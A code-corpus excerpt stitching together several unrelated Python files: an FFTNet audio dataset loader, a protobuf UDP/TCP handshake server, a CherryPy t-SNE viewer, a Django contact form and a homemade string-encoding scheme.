app = Flask(__name__)
@app.route('/')
def start():
return 'App Is Started' | 2.21875 | 2 |
util/loading_dataset.py | mimbres/FFTNet | 0 | 12761646 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
loading_dataset.py
Created on Thu May 3 12:47:36 2018
@author: sungkyun
"""
import torch
from torch.utils.data.dataset import Dataset
#from torch import from_numpy
import numpy as np
import pandas as pd
#from sklearn import preprocessing
#from sklearn.preprocessing import StandardScaler
#from sklearn.externals import joblib
import glob
from nnmnkwii import minmax_scale, scale
DIM_INDEX = dict()
DIM_INDEX['linguistic'] = np.arange(0,420) # source: /linguistic
DIM_INDEX['f0'] = [0] # source: /pyworld
DIM_INDEX['log-f0'] = [1] # source: /pyworld
DIM_INDEX['vuv'] = [2] # source: /pyworld
DIM_INDEX['bap'] = [3] # source: /pyworld
DIM_INDEX['melcep'] = np.arange(4,64) # source: /pyworld
DIM_INDEX['pyspec'] = np.arange(64,577) # source: /pyworld
DIM_INDEX['melspec'] = np.arange(0, 128) # source: /melmfcc
DIM_INDEX['mfcc'] = np.arange(128,153) # source: /melmfcc
class CmuArcticDataset(Dataset):
def __init__(self, data_root_dir=None, random_zpad=bool, cond_feature_select=None, transform=None):
#data_root_dir = 'data/processed_slt_arctic/TRAIN/'
#data_root_dir = 'data/processed_slt_arctic/TEST/'
self.mulaw_filepaths = sorted(glob.glob(data_root_dir + 'mulaw/*.npy'))
self.linguistic_filepaths = sorted(glob.glob(data_root_dir + 'linguistic/*.npy'))
self.melmfcc_filepaths = sorted(glob.glob(data_root_dir + 'melmfcc/*.npy'))
self.pyworld_filepaths = sorted(glob.glob(data_root_dir + 'pyworld/*.npy'))
self.file_ids = [path.split('/')[-1][:-4] for path in self.mulaw_filepaths]
self.random_zpad = random_zpad
self.cond_feature_select = cond_feature_select # ['linguistic', 'f0', 'log-f0', 'vuv','bap', 'melcep', 'pyspec', 'melspec', 'mfcc']
self.transform = transform
self.scale_factor = np.load(data_root_dir + '../scale_factors.npy')
# Construct conditional feature selection info
global DIM_INDEX
self.cond_info = dict()
self.cond_dim = 0 # total dimension of condition features
for sel in self.cond_feature_select:
self.cond_info[sel] = np.arange(self.cond_dim, self.cond_dim + len(DIM_INDEX[sel]))
self.cond_dim += len(DIM_INDEX[sel])
def __getitem__(self, index):
# Get 3 items: (file_id, mulaw, cond)
file_id = self.file_ids[index]
x = np.load(self.mulaw_filepaths[index]) # size(x) = (T,)
cond = np.empty((len(x),0), np.float16) # size(cond) = (T,d)
cond_linguistic, cond_pyworld, cond_melmfcc = [], [], []
if any(sel in self.cond_feature_select for sel in ['linguistic']):
cond_linguistic = np.load(self.linguistic_filepaths[index])
if any(sel in self.cond_feature_select for sel in ['f0', 'log-f0', 'vuv', 'bap', 'melcep', 'pyspec']):
cond_pyworld = np.load(self.pyworld_filepaths[index])
if any(sel in self.cond_feature_select for sel in ['melspec', 'mfcc']):
cond_melmfcc = np.load(self.melmfcc_filepaths[index])
global DIM_INDEX
for sel in self.cond_feature_select:
if sel is 'linguistic':
cond = np.hstack((cond, cond_linguistic))
elif sel in ['f0', 'log-f0', 'vuv', 'bap', 'melcep', 'pyspec']:
cond = np.hstack((cond, cond_pyworld[:,DIM_INDEX[sel]]))
elif sel in ['melspec', 'mfcc']:
cond = np.hstack((cond, cond_melmfcc[:,DIM_INDEX[sel]]))
assert(cond.shape[1]==self.cond_dim) # check if stacked cond feature size mismatches
# Feature-scaling
cond = self.featScaler(cond)
# Transpose
cond = np.transpose(cond) # size(cond) = (T,d) --> (d, T): required for pytorch dataloading
# Random zeropadding 20~50%
if self.random_zpad is True:
zpad_sz = int(len(x) * np.random.uniform(0.2,0.5))
x[0:zpad_sz] = 128 # fill first <zpad_sz> samples with zeros (in mulaw-enc, 128)
cond[:,0:zpad_sz] = 0.
return file_id, torch.LongTensor(x), cond
def featScaler(self, feat):
for sel in self.cond_feature_select:
if sel is 'linguistic':
feat[:,self.cond_info[sel]] = minmax_scale(feat[:,self.cond_info[sel]],
self.scale_factor['linguistic_min'], self.scale_factor['linguistic_max'], feature_range=(0.01, 0.99))
return feat
def __len__(self):
return len(self.file_ids) # return the number of examples that we have
class YesNoDataset(Dataset):
def __init__(self, csv_path=None, zpad_target_len=int, transform=None):
# Internal variables
#csv_path = 'data/processed_yesno/test.csv'
#csv_path = 'data/processed_yesno/train.csv'
self.zpad_target_len = zpad_target_len
self.transform = transform
self.file_ids = None
self.mulaw_filepaths = None
self.mfcc_filepaths = None
# Reading .csv file
df = pd.read_csv(csv_path, index_col=0) # ['file_id', 'mulaw_filepath', 'mfcc_filepath']
self.file_ids = df.iloc[:,0]
self.mulaw_filepaths = df.iloc[:,1]
self.mfcc_filepaths = df.iloc[:,2]
def __getitem__(self, index):
# Get 3 items: (file_id, x = mulaw, cond = mfcc)
file_id = self.file_ids[index]
x = np.load(self.mulaw_filepaths[index]) # size = (T,)
cond = np.load(self.mfcc_filepaths[index]) # size = (25,T)
if self.zpad_target_len:
x_length = x.shape[0]
if x_length > self.zpad_target_len:
x = x[0:self.zpad_target_len]
elif x_length < self.zpad_target_len:
zpad_sz = self.zpad_target_len - x_length
x = np.pad(x, (zpad_sz,0), mode='constant', constant_values=128) # padding first 48,000 samples with zeros
cond_length = cond.shape[1]
if cond_length > self.zpad_target_len:
cond = cond[:, 0:self.zpad_target_len]
elif cond_length < self.zpad_target_len:
zpad_sz = self.zpad_target_len - cond_length
cond = np.pad(cond, ((0,0),(zpad_sz, 0)), mode='constant')
return file_id, torch.LongTensor(x), cond
def __len__(self):
return len(self.file_ids) # return the number of examples that we have
| 2.046875 | 2 |
tool-server/handshake_responder.py | CSharperMantle/arbiter | 0 | 12761647 | <reponame>CSharperMantle/arbiter
from ipaddress import IPv4Address
from socketserver import UDPServer, BaseRequestHandler, StreamRequestHandler, ThreadingMixIn, TCPServer
from math import floor
from random import random
from threading import Thread
from time import sleep, time
from WirelessClientMessage_pb2 import WirelessClientMessage
from WirelessHostMessage_pb2 import WirelessHostMessage
clients = []
class ThreadedUDPServer(ThreadingMixIn, UDPServer):
pass
class ThreadedTCPServer(ThreadingMixIn, TCPServer):
pass
class UDPHandler(BaseRequestHandler):
def handle(self):
in_data = self.request[0].strip()
in_packet = WirelessClientMessage.FromString(in_data)
print("U: Got UDP packet from {}, type {}".format(
self.client_address,
in_packet.type
))
out_socket = self.request[1]
if in_packet.type == WirelessClientMessage.HANDSHAKE_REQUEST:
out_packet = WirelessHostMessage()
out_packet.type = WirelessHostMessage.HANDSHAKE_ASSIGNMENT
out_packet.assignment.id = floor(1023 * random() + 1)
out_packet.assignment.address_ipv4 = int(
IPv4Address(self.client_address[0]))
out_packet.assignment.latency = 0
out_socket.sendto(
out_packet.SerializeToString(),
self.client_address
)
elif in_packet.type == WirelessClientMessage.HANDSHAKE_ASSIGNMENT_CONFIRMATION:
clients.append(
(in_packet.assignment.id, IPv4Address(self.client_address[0]))
)
class TCPHandler(BaseRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._last_ping = -1
def handle(self):
print("T: TCP connection established with {}".format(self.client_address))
while True:
ping_packet = WirelessHostMessage()
ping_packet.type = WirelessHostMessage.PING
out_data = ping_packet.SerializeToString()
sleep(1)
print("T: Pinging {} with {}".format(
self.client_address, out_data
))
self.request.sendall(out_data)
self._last_ping = time()
print("T: Waiting for Pong from {}".format(self.client_address))
in_data = self.request.recv(1024).strip()
in_packet = WirelessClientMessage.FromString(in_data)
print("T: Got TCP packet from {}, type {}".format(
self.client_address,
in_packet.type
))
if in_packet.type == WirelessClientMessage.PONG:
print("T: Ping latency: {}".format(time() - self._last_ping))
self._last_ping = -1
sleep(5)
if __name__ == "__main__":
print("Starting handshake responder...")
udp_server = ThreadedUDPServer(("0.0.0.0", 10010), UDPHandler)
tcp_server = ThreadedTCPServer(("0.0.0.0", 10011), TCPHandler)
udp_thread = Thread(target=udp_server.serve_forever, daemon=True)
tcp_thread = Thread(target=tcp_server.serve_forever, daemon=True)
udp_thread.start()
tcp_thread.start()
print("I: UDP server running on thread {}.".format(udp_thread.name))
print("I: TCP server running on thread {}.".format(tcp_thread.name))
try:
while True:
pass
except KeyboardInterrupt:
print("I: Stopping UDP server...")
udp_server.shutdown()
udp_thread.join()
print("I: Stopping TCP server...")
tcp_server.shutdown()
tcp_thread.join()
print("I: Stopped.")
| 2.53125 | 3 |
visualize_2d_data.py | christopher-beckham/tsne-d3-python | 16 | 12761648 | import os
from glob import glob
import argparse
import cherrypy
from jinja2 import Environment, FileSystemLoader
env = Environment(loader=FileSystemLoader('templates'))
DATA_FOLDER = 'data'
class Server(object):
@cherrypy.expose
def index(self, data=None):
data = data if data is not None else DATA_FOLDER
csv_file = '{0}.csv'.format(data)
images_folder = data
if not os.path.exists(os.path.join('public', csv_file)):
return "Error: csv file does not exist in public folder: {0}".format(csv_file)
if not os.path.exists(os.path.join('public', images_folder)):
return "Error: data folder does not exist in public folder: {0}".format(images_folder)
if len(glob(os.path.join('public', images_folder)+'/*')) <= 1:
return "Error: data folder does not seem to contain any images"
tmpl = env.get_template('index.html')
return tmpl.render(csv_file=csv_file, images_folder=images_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Visualize 2D data. Useful with t-sne data.')
parser.add_argument('--host', type=str, default='0.0.0.0', help='socket host')
parser.add_argument('--port', type=int, default=8080, help='socket port')
parser.add_argument('--data', type=str, default='data', help='data path')
args = parser.parse_args()
DATA_FOLDER = args.data
conf = {
'global' : {
'server.socket_host' : args.host,
'server.socket_port' : args.port
},
'/': {
'tools.sessions.on': True,
'tools.staticdir.root': os.path.abspath(os.getcwd())
},
'/static': {
'tools.staticdir.on': True,
'tools.staticdir.dir': './public'
}
}
cherrypy.quickstart(Server(), '/', conf)
| 2.640625 | 3 |
API_Forms/gestionPedidos/Forms.py | BrianMarquez3/Python-Django | 2 | 12761649 | # API FORMS
from django import forms
class FormularioContacto(forms.Form):
asunto=forms.CharField()
email=forms.EmailField()
mensaje=forms.CharField() | 1.578125 | 2 |
shiSock-0.3.0/test/shikhar/shikhar.py | AnanyaRamanA/shiSock | 0 | 12761650 | from base64 import b64encode, b64decode
from random import shuffle, sample, randint
from fractions import Fraction
a = {"a":1,"b":2,"c":3,"d":4,"e":5,"f":6,"g":7,"h":8,"i":9,"j":10,"k":11,"l":12,
"m":13,"n":14,"o":15,"p":16,"q":17,"r":18,"s":19,"t":20,"u":21,"v":22,"w":23,
"x":24,"y":25,"z":26,"?" : 0}
b = {0:"?", 1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e', 6: 'f', 7: 'g', 8: 'h', 9: 'i', 10: 'j',
11: 'k', 12: 'l', 13: 'm', 14: 'n', 15: 'o', 16: 'p', 17: 'q', 18: 'r', 19: 's',
20: 't', 21: 'u', 22: 'v', 23: 'w', 24: 'x', 25: 'y', 26: 'z'}
special = list("!@#$%^&*()~`")
def shikharEncode(data):
specials = special
shuffle(specials)
qw = ""
for l in data:
qw += str(a[l])+str(0)
qw = int(qw)
random_num = randint(9999999,99999999)
multiply = qw * random_num
new_str = ""
for i,num in enumerate(str(multiply)):
if num == "0":
new_str += num
else:
new_str += b[int(num)]
len_new_str = len(new_str)
samples = sample(range(1,len_new_str),10)
new_str_lst = list(new_str)
for i,key in enumerate(samples):
new_str_lst.insert(key,special[i])
asa ="".join([b[int(x)] for x in str(random_num)])
join = "".join(new_str_lst) + "|~|" + asa
return b64encode(bytes(join,"utf-8"))
def shikharDecode(data):
res = b64decode(data).decode().split("|~|")
random_num = int("".join([str(a[x]) for x in list(res[1])]))
lst = [x for x in list(res[0]) if x not in special]
number_str = ""
for char in lst:
if char == "0":
number_str += "0"
else:
number_str += str(a[char])
number_str = Fraction(int(number_str))
random_num = Fraction(random_num)
real_num = number_str/random_num
get = str(real_num).split("0")
return "".join([ b[int(x)] for x in get if x != ""]) | 2.875 | 3 |